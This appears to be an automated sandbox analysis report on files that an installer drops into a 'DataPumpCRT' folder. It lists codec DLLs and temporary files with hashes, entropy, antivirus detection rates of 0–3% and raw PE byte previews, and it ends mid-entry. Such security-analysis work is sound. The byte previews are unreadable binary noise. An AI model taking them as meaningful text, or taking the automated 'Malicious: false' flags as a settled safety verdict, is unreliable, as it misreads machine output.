Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....."b...........!.........x.......P.......................................`.......Z....@.........................PR.......Q..d....0..0............}......D........................................................Q..8.................................... .......t..................@..@.rsrc.... ...0.......v..............@..@petite.......P.......z..............`..`......................p..k..K..i{..\.H..'.\|w.t...\..dkB%..i.cX...`B...m.X..A.NU.i.I. J.I....x-.e2n.IA.2.:..2G5Z/.+(8w.S<...`ML........!..%+.r.s.1.~.D...]......U..q3.....9..?y.>j.E.T...Y..D..>..aJ......P^Y..w?.9w.,...+C^.[....\|..'.....7..F%..A.....)..b.)8.2Q`.v.F=.."S..{z...z-H=....L_....RM..s......H2P1a....[..i. 2..~.?...+R... .m(.I..X...H.g.Z..i..G.?.(......e.:.B......fh......gl.x.Z......I>..#....Hgv.;g.@ l.$(...0.........l.>.p..z;A.@...*4v..x.U.gU..Bqqb..6.x...D.....cIE(5m.g}J..

C:\Program Files (x86)\DataPumpCRT\bin\x86\basscd.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18966
Entropy (8bit):	7.620111275837424
Encrypted:	false
SSDEEP:	384:gOKwxnw6OVDU839fgRgFMkucNauTT80CyTIz2bGjqXOK0Jo:gOHwBDUOe2McQkI0Cyo2Q/o
MD5:	F0F973781B6A66ADF354B04A36C5E944
SHA1:	8E8EE3A18D4CEC163AF8756E1644DF41C747EDC7
SHA-256:	04AB613C895B35044AF8A9A98A372A5769C80245CC9D6BF710A94C5BC42FA1B3
SHA-512:	118D5DACC2379913B725BD338F8445016F5A0D1987283B082D37C1D1C76200240E8C79660E980F05E13E4EB79BDA02256EAC52385DAA557C6E0C5D326D43A835
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...................................D.... ..PE..L...9#.]...........!.........B...............p............................................@.....................................x.......@....................M..........................................................@............................................>..................@..@.rsrc................@..............@..@.......................................@petite...............D..............`..`....................................g5 ....S%,_ .]/.0$R.yB..."@...N.AGG.^.?...1.........&?....v....6.0.. ME..(..gh\jv#.l..#$.Z&...._\`.@.......D.;.C~..m}3..\>.h..@.;.f Tho...(xVs..m.c..F..SS.C...z[....z...... .X.&....HY,...o.d..jP.nr..@.)..W.1#...b..Q.*E8.B..N5.....].........7..A..2c.M.q.O0(.Gi..B.....CT.(..+....>@T j.#!..."..P.u.3..5.Q0K..p....ERvG..._'...ir%m...NT.v:.....g.....8.+....m....8..Z.=.B.......D_..ln...C.......p8...e."...U...+.f..E.=X.j.DeD.X_.Y..n.r.!xWu..\.VB.......`.F.A....dx...

C:\Program Files (x86)\DataPumpCRT\bin\x86\bassdsd.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	8456
Entropy (8bit):	6.767152008521429
Encrypted:	false
SSDEEP:	192:yxPHUtfhriUVoSoGtyo2xmJ8GbarAtT7/lxjFZnPK0cl:KPehriU3t2IiGbHTxZnPK0cl
MD5:	19E08B7F7B379A9D1F370E2B5CC622BD
SHA1:	3E2D2767459A92B557380C5796190DB15EC8A6EA
SHA-256:	AC97E5492A3CE1689A2B3C25D588FAC68DFF5C2B79FCF4067F2D781F092BA2A1
SHA-512:	564101A9428A053AA5B08E84586BCBB73874131154010A601FCE8A6FC8C4850C614B4B0A07ACF2A38FD2D4924D835584DB0A8B49EF369E2E450E458AC32CF256
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................D.... ..PE..L...#.MZ...........!.................p.......0............................................@.........................Pr.......q..d....P..8....................%.......................................................q..8....................................@..........................@..@.rsrc........P......................@..@.............`.........................@petite.......p......................`..`..................................................l..a.......1...3W..Z.....H...5.(...$.. .>X9..Fn... ..."j1..........%.7.d...".m...n.ePY......`....I.gYo..UC....Rq(...F......s..8`.I.....i..F.....'......@..-;.........J...Oq...b@...........$.D4E..($.....8':;.q....[-..{..w....@M....J$..0d..9Q.I^.^y.E..L_-.x!s.......W.H.R..@.6....MQ.Q8.s.."...!."IX.vM...!e.$%......U.....F.CoI..X.dA...0.Y..r.8.*p...<..M y...8..s....N5<.J....&..`...w..'..\s..%..A.`....s..j.H...X#..R.\..)R3@..X.P.5...G..t.f/..C.b.d...\|.

C:\Program Files (x86)\DataPumpCRT\bin\x86\bassflac.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	36752
Entropy (8bit):	7.780431937344781
Encrypted:	false
SSDEEP:	768:E7epCl6I8YbTvEKXQ2vm+iocmmMt7KjuDnlVahRlmftuY5B:EepUv8aZvmd+7nDDalauy
MD5:	9FF783BB73F8868FA6599CDE65ED21D7
SHA1:	F515F91D62D36DC64ADAA06FA0EF6CF769376BDF
SHA-256:	E0234AF5F71592C472439536E710BA8105D62DFA68722965DF87FED50BAB1816
SHA-512:	C9D3C3502601026B6D55A91C583E0BB607BFC695409B984C0561D0CBE7D4F8BD231BC614E0EC1621C287BF0F207017D3E041694320E692FF00BC2220BFA26C26
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!.........n.......................................................B....@.........................P...........d.......@............s.......x..........................................................8............................................j..................@..@.rsrc.... ...........l..............@..@petite...............p..............`..`..................8..u...I.x\|}...g{...@..ffe.c4.-.Bj..........U.J.`..s.N:`..I@;..B.kbmj..E%2. `....".]&.&.).BB...E..4u'.....Q.......%....V.............5...y....E..q<w.....j...B..O...p.....X...m...= .X..........4........~~.8.F@.V...6....;?.5..)S.m.9U......^.zO!1o.F.E. ...H=`2...9.(...4).E.!G..;R.1.#.h0..(..t8..O...Td.d..~...l.a..U...b<../..W....M6...U*G..II.x........>..I[...v.N/.V..3..Y.c...Zh.i..i.....n....M..D....5o."....(.9.+..z...._$t.T...X#\...N....Q%...>U..\|....J

C:\Program Files (x86)\DataPumpCRT\bin\x86\bassmidi.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	36416
Entropy (8bit):	7.842278356440954
Encrypted:	false
SSDEEP:	768:lshkyPXvH6bPACtmb8boNQdVfCXewki/OvXEApOqmFfSq1oIQMW:lsh3n5Pb8boOdVCuwNEXEAonfSq1JQb
MD5:	BEBA64522AA8265751187E38D1FC0653
SHA1:	63FFB566AA7B2242FCC91A67E0EDA940C4596E8E
SHA-256:	8C58BC6C89772D0CD72C61E6CF982A3F51DEE9AAC946E076A0273CD3AAF3BE9D
SHA-512:	13214E191C6D94DB914835577C048ADF2240C7335C0A2C2274C096114B7B75CD2CE13A76316963CCD55EE371631998FAC678FCF82AE2AE178B7813B2C35C6651
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................D.... ..PE..L....}.Q...........!................6 ............`..........................0......................................d#.......!..........@...................t...........................................................................................................................`....rsrc...........@...................@..@....................................@................ ......................`.......................................X...{.......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!... c.f.`P....h.p..j..P..C.h..`..<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$....P(......P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I.....................]...............'..................................A...%...........

C:\Program Files (x86)\DataPumpCRT\bin\x86\bassmix.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19008
Entropy (8bit):	7.672481244971812
Encrypted:	false
SSDEEP:	384:dz7otnjFa4ECX3yeGjA+tSXGnUav92hca+XWRlsuG+is:po7GU+szS3W7sQ7
MD5:	8EE91149989D50DFCF9DAD00DF87C9B0
SHA1:	E5581E6C1334A78E493539F8EA1CE585C9FFAF89
SHA-256:	3030E22F4A854E11A8AA2128991E4867CA1DF33BC7B9AFF76A5E6DEEF56927F6
SHA-512:	FA04E8524DA444DD91E4BD682CC9ADEE445259E0C6190A7DEF82B8C4478A78AAA8049337079AD01F7984DBA28316D72445A0F0D876F268A062AD9B8FF2A6E58D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................D.... ..PE..L....+vS...........!....6...6.......6........p......................................................................0..........P.......@...................tM.......................................................................................................>..................`....rsrc...........@....H..............@..@....................................@...........6...........................`.......................................D...n'......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!......f.`P....h.5..j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X............f.......Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$....P(......P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I..K..........(...\|...}K...................E..K....p..j...g........Q..........y...........

C:\Program Files (x86)\DataPumpCRT\bin\x86\bassopus.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	68876
Entropy (8bit):	7.922125376804506
Encrypted:	false
SSDEEP:	1536:q0Z4sz1ZMjCjDIhoLffiedENahBzzxO/JfgmYFGKEvi8TxCI+vHVl:v4MzMjGkhoLfsahS/JYN2vUl
MD5:	4E35BA785CD3B37A3702E577510F39E3
SHA1:	A2FD74A68BEFF732E5F3CB0835713AEA8D639902
SHA-256:	0AFE688B6FCA94C69780F454BE65E12D616C6E6376E80C5B3835E3FA6DE3EB8A
SHA-512:	1B839AF5B4049A20D9B8A0779FE943A4238C8FBFBF306BC6D3A27AF45C76F6C56B57B2EC8F087F7034D89B5B139E53A626A8D7316BE1374EAC28B06D23E7995D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...................................D.... ..PE..L.....U]...........!......................... ............................................@.........................P...........d.......@...............................................................................8...............................................................@..@.rsrc...............................@..@.......................................@petite..............................`..`...........................................&MK#H..OEJ..}??...:..$ayf.r7.w(/.d`...A(7.%p.f.>\..d."..W......[4.0..ZY..... .....~...T....9a+..'.......g!.....l...<..?Y.(..[k.I=....D.....c..=.?.8...D>0...#.ZdO..Z...%......X.P..bS..s..=$...m.N........A......A4..J>Wa.N..K.>....2n8.ii.#....y#.J ....i!...a7..Pbl@B.%h0..8RSr.........]..z.\...x..e..5.3.$h. <G.3....-......Q....O0..,......Y}......@...<...t.H).T..! .....ap......Tj.o...0b...`..yX.. g...hzA...b.7.s$M.... ..'....\$...H.\.l.C g..4..(.6@.Q....B(..

C:\Program Files (x86)\DataPumpCRT\bin\x86\basswma.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17472
Entropy (8bit):	7.524548435291935
Encrypted:	false
SSDEEP:	384:IwwsQD13cT5HhSVeEQNW5kbbcGEh/qTio+lyTnGy:QRD13ySVeEOW5kbSSTHNTnr
MD5:	7B52BE6D702AA590DB57A0E135F81C45
SHA1:	518FB84C77E547DD73C335D2090A35537111F837
SHA-256:	9B5A8B323D2D1209A5696EAF521669886F028CE1ECDBB49D1610C09A22746330
SHA-512:	79C1959A689BDC29B63CA771F7E1AB6FF960552CADF0644A7C25C31775FE3458884821A0130B1BAB425C3B41F1C680D4776DD5311CE3939775A39143C873A6FE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................D.... ..PE..L....^.L...........!....%v..%.......6........`......................................................................h..................@....................F...............................................................................................p.......8..................`....rsrc...........@....B..............@..@....................................@...........%...........................`.......................................X...x..0....j...f.!.PRj.....j..S.ERROR!.Corrupt Data!......f.`P....h.,..j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$....P(......P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I..D..%...........\|...CC.......p......n....<.......`..............lH......)...............

C:\Program Files (x86)\DataPumpCRT\bin\x86\basswv.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	35588
Entropy (8bit):	7.817557274117395
Encrypted:	false
SSDEEP:	768:dCrMZHv56WRldhmLjQDrbfc8cznHvc6modHQ:sAR0LzHvc6m2HQ
MD5:	58521D1AC2C588B85642354F6C0C7812
SHA1:	5912D2507F78C18D5DC567B2FA8D5AE305345972
SHA-256:	452EEE1E4EF2FE2E00060113CCE206E90986E2807BB966019AC4E9DEB303A9BD
SHA-512:	3988B61F6B633718DE36C0669101E438E70A17E3962A5C3A519BDECC3942201BA9C3B3F94515898BB2F8354338BA202A801B22129FC6D56598103B13364748C1
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...................................D.... ..PE..L.....yX...........!.................@.......................................P............@.........................PB.......A..d.... ..@...................P........................................................A..8...............................................................@..@.rsrc........ ......................@..@.............0.........................@petite.......@......................`..`...................................._3.....g.ge..7t...R-_.R.@c.S.\..J?L.EZ.,....=H8..;.QJ.....P-)eFs93:.^...f......}..?...e...SD.......-.u.......q2...P...6..z5.T.S..P..Q....@..Mq.>....8" F...,..FE...S.[U..c......jr....b...-%...`......w..+W.C......]..#......LS....W.Y....o.8...i.[)..%(.2.t...YY .bL.....b.@&J,?l.........$..F..&...a#.\[".^...&]co....K.>...xQzw..XW.uT..+dm.o.b...@c....3..r....@]...P........{C/.....A!.&..........'....._..."S..&..F.......:.dxtK.6...7.I...Q..Nm2.....NX..fG..L..7.?..".(

C:\Program Files (x86)\DataPumpCRT\bin\x86\copying (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	Unicode text, UTF-8 text
Category:	dropped
Size (bytes):	1059
Entropy (8bit):	5.1208137218866945
Encrypted:	false
SSDEEP:	24:LLDrmJHHH0yN3gtsHw1hj9QHOsUv4eOk4/+/m3oqLF5n:LLDaJHlxE35QHOs5exm3ogF5n
MD5:	B7EDCC6CB01ACE25EBD2555CF15473DC
SHA1:	2627FF03833F74ED51A7F43C55D30B249B6A0707
SHA-256:	D6B4754BB67BDD08B97D5D11B2D7434997A371585A78FE77007149DF3AF8D09C
SHA-512:	962BD5C9FB510D57FAC0C3B189B7ADEB29E00BED60F0BB9D7E899601C06C2263EDA976E64C352E4B7C0AAEFB70D2FCB0ABEF45E43882089477881A303EB88C09
Malicious:	false
Preview:	Copyright (c) 2011 Jan Kokem.ller..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONNECTION WITH

C:\Program Files (x86)\DataPumpCRT\bin\x86\d_writer.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	16910
Entropy (8bit):	5.289608933932413
Encrypted:	false
SSDEEP:	384:ohtyjknGC7hipL+9mLYFOozxkdlDNUwS5Qq:UGknGC74l+MUFI7C
MD5:	2F040608E68E679DD42B7D8D3FCA563E
SHA1:	4B2C3A6B8902E32CDA33A241B24A79BE380C55FC
SHA-256:	6B980CADC3E7047CC51AD1234CB7E76FF520149A746CB64E5631AF1EA1939962
SHA-512:	718AF5BE259973732179ABA45B672637FCA21AE575B4115A62139A751C04F267F355B8F7F7432B56719D91390DABA774B39283CBCFE18F09CA033389FB31A4FC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........B.........#.........>...f...........0.....h......................... ................ .........................{.......\|...............................$...........................pA.......................................................text...4...........................`.P`.data...<....0......."..............@.0..rdata.......@.......$..............@.`@/4...........P.......(..............@.0@.bss.....d...`........................`..edata..{............2..............@.0@.idata..\|............4..............@.0..CRT....,............:..............@.0..tls.................<..............@.0..reloc..$............>..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\da.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	15374
Entropy (8bit):	5.192037544202194
Encrypted:	false
SSDEEP:	384:lhgkOI7BGi9gKV6uq+u6JewsNhNXUwSCgQ:DT7BGVKPKbXF
MD5:	BEFD36FE8383549246E1FD49DB270C07
SHA1:	1EF12B568599F31292879A8581F6CD0279F3E92A
SHA-256:	B5942E8096C95118C425B30CEC8838904897CDEF78297C7BBB96D7E2D45EE288
SHA-512:	FD9AA6A4134858A715BE846841827196382D0D86F2B1AA5C7A249B770408815B0FE30C4D1E634E8D6D3C8FEDBCE4654CD5DC240F91D54FC8A7EFE7CAE2E569F4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........<.........#.........8...............0.....f................................b......... ......................p..E.......h...........................................................P@......................................................text...............................`.P`.data...,....0....... ..............@.0..rdata.......@......."..............@.0@/4...........P.......$..............@.0@.bss.........`........................`..edata..E....p......................@.0@.idata..h............0..............@.0..CRT....,............6..............@.0..tls.................8..............@.0..reloc...............:..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\daiso.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	197646
Entropy (8bit):	6.1570532273946625
Encrypted:	false
SSDEEP:	3072:brPGp0y4SP+iBGgySYm+dE3sYrJqkAzhU88vsAGSW+:brPGaTEsHSYmbbOU8osAGG
MD5:	2C8EC61630F8AA6AAC674E4C63F4C973
SHA1:	64E3BB9AA505C66E87FE912D4EA3054ADF6CEF76
SHA-256:	DFD55D0DDD1A7D081FCE8E552DC29706A84DC6CA2FDD2F82D63F33D74E882849
SHA-512:	488378012FB5F477ED4636C37D7A883B1DAD0FBC671D238B577A9374EFE40AB781F5E483AE921F1909A9B7C1C2A3E78E29B533D3B6FFE15AAEE840CAD2DCF5D0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...............................m................................]_........ ...................... ..A....0...............................`..............................p0.......................1..D............................text...............................`.P`.data...............................@.0..rdata..L0.......2..................@.`@/4...........P......................@.0@.bss..................................`..edata..A.... ......................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..reloc.......`......................@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\dsd2.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	31936
Entropy (8bit):	6.6461204214578
Encrypted:	false
SSDEEP:	768:SEEn30ilOAb++HynTDbc3fwaVCPxWE/MM:SEa0YOU1HgU3fwaVCPxqM
MD5:	72E3BDD0CE0AF6A3A3C82F3AE6426814
SHA1:	A2FB64D5B9F5F3181D1A622D918262CE2F9A7AA3
SHA-256:	7AC8A8D5679C96D14C15E6DBC6C72C260AAEFB002D0A4B5D28B3A5C2B15DF0AB
SHA-512:	A876D0872BFBF099101F7F042AEAF1FD44208A354E64FC18BAB496BEEC6FDABCA432A852795CFC0A220013F619F13281B93ECC46160763AC7018AD97E8CC7971
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........P.........#.....&...L...............@.....d................................8......... .........................b............................P...,...................................R......................x................................text....%.......&..................`.P`.data........@.......*..............@.`..rdata.......P.......,..............@.0@/4...........`.......2..............@.0@.bss.........p........................`..edata..b............>..............@.0@.idata...............@..............@.0..CRT....,............H..............@.0..tls.................J..............@.0..reloc...............L..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\dsd2pcmt.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	197120
Entropy (8bit):	6.423554884287906
Encrypted:	false
SSDEEP:	6144:X+dMKihenEUunaA+mVMISPCG5vHglwiaJVZkRyAHeOdrQpCklkHy+axeY0R2JdXs:MagxOOZWP2dC28d+y2e
MD5:	67247C0ACA089BDE943F802BFBA8752C
SHA1:	508DA6E0CF31A245D27772C70FFA9A2AE54930A3
SHA-256:	BAB8D388EA3AF1AABB61B8884CFAA7276A2BFD77789856DD610480C55E4D0A60
SHA-512:	C4A690A53581D3E4304188FD772C6F1DA1C72ED2237A13951ACE8879D1986423813A6F7534FF506790CB81633CEB7FF6A6239C1F852725FBACA4B40D9AE3F2DB
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d,.. M.. M.. M..4&..-M..4&...M..4&..3M..r8...M..r8../M..r8..1M..4&..#M.. M.._M..v8..$M..v8..!M..v8..!M..v8..!M..Rich M..........PE..L... ..a...........!.........................................................@............@.........................@...p.......(............................ ..(...P...8...............................@...............H............................text...>........................... ..`.rdata..d...........................@..@.data...H...........................@....rsrc...............................@..@.reloc..(.... ......................@..B........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\dstt.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	115712
Entropy (8bit):	6.401537154757194
Encrypted:	false
SSDEEP:	3072:rY4gILp0Vt7BMkvfHutO+eP0ZjflQf5xqkYXeo21sb2rqG70:rY4gILp0Vt77nLBCtQfjqv8qG70
MD5:	840D631DA54C308B23590AD6366EBA77
SHA1:	5ED0928667451239E62E6A0A744DA47C74E1CF89
SHA-256:	6BAD60DF9A560FB7D6F8647B75C367FDA232BDFCA2291273A21179495DAC3DB9
SHA-512:	1394A48240BA4EF386215942465BDE418C5C6ED73FC935FE7D207D2A1370155C94CDC15431985ED4E656CA6B777BA79FFC88E78FA3D99DB7E0E6EAC7D1663594
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?..R{...{...{...o...q...o.......o...i...)...W...)...t...)...j...o...x...{.......-...s...-...z...-.4.z...-...z...Rich{...........PE..L....H.a...........!.....$...........h.......@............................... ............@.............................x.......(.......................................8..............................@............@..D............................text....#.......$.................. ..`.rdata...x...@...z...(..............@..@.data.... ..........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\ff_helper.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	62478
Entropy (8bit):	6.063363187934607
Encrypted:	false
SSDEEP:	768:q3s6+NMpjqudP/XB9rGCWLEc6wY3U0LvDcb0wGNPdqdRJy/5f4mdajO42iySAqB:q8zNM1nBId/ce7GNP6m/5AQGySAs
MD5:	940EEBDB301CB64C7EA2E7FA0646DAA3
SHA1:	0347F029DA33C30BBF3FB067A634B49E8C89FEC2
SHA-256:	B0B56F11549CE55B4DC6F94ECBA84AEEDBA4300D92F4DC8F43C3C9EEEFCBE3C5
SHA-512:	50D455C16076C0738FB1FECAE7705E2C9757DF5961D74B7155D7DFB3FAB671F964C73F919CC749D100F6A90A3454BFF0D15ED245A7D26ABCAA5E0FDE3DC958FD
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...............................k.........................`................ .........................r.......D............................P..\|.......................................................\............................text...............................`.P`.data...0...........................@.0..rdata..8...........................@.`@/4......L...........................@.0@.bss..................................`..edata..r...........................@.0@.idata..D...........................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc..\|....P......................@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\gain_analysis.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	26126
Entropy (8bit):	6.048294343792499
Encrypted:	false
SSDEEP:	384:hhkxE9v7/GRm4v5OxlBWaEybb9p7aCyS/hU7CateHcUwSCnq6D:Yx6jGXvc5WaBb99yS/hQh
MD5:	D1223F86EDF0D5A2D32F1E2AAAF8AE3F
SHA1:	C286CA29826A138F3E01A3D654B2F15E21DBE445
SHA-256:	E0E11A058C4B0ADD3892E0BEA204F6F60A47AFC86A21076036393607235B469C
SHA-512:	7EA1FFB23F8A850F5D3893C6BB66BF95FAB2F10F236A781620E9DC6026F175AAE824FD0E03082F0CF13D05D13A8EEDE4F5067491945FCA82BBCDCF68A0109CFF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........f.........#.....6...b...............P.....h................................8-........ .........................i...................................................................Lk......................................................text....4.......6..................`.P`.data...,....P.......:..............@.0..rdata.......`.......<..............@.`@/4......T....p.......J..............@.0@.bss..................................`..edata..i............V..............@.0@.idata...............X..............@.0..CRT....,............^..............@.0..tls.................`..............@.0..reloc...............b..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\is-02A0E.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	227328
Entropy (8bit):	6.641153481093122
Encrypted:	false
SSDEEP:	6144:jtJXnqDMJgH50aKyumLCGTrS4ifbjoO88k:KqgHlKyumLCGTrS4inoZ
MD5:	BC824DC1D1417DE0A0E47A30A51428FD
SHA1:	C909C48C625488508026C57D1ED75A4AE6A7F9DB
SHA-256:	A87AA800F996902F06C735EA44F4F1E47F03274FE714A193C9E13C5D47230FAB
SHA-512:	566B5D5DDEA920A31E0FB9E048E28EF2AC149EF075DB44542A46671380F904427AC9A6F59FBC09FE3A4FBB2994F3CAEEE65452FE55804E403CEABC091FFAF670
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...e>.a...........#.........t...V.................e.........................@......1......... .........................#....................................0...............................).......................................................text...............................`.P`.data...............................@.`..rdata..d0.......2..................@.`@.eh_framd@...@...B..................@.0@.bss.....T............................`..edata..#............T..............@.0@.idata...............^..............@.0..CRT....,............d..............@.0..tls......... .......f..............@.0..reloc.......0.......h..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\DataPumpCRT\bin\x86\is-058DS.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	43520
Entropy (8bit):	6.232860260916194
Encrypted:	false
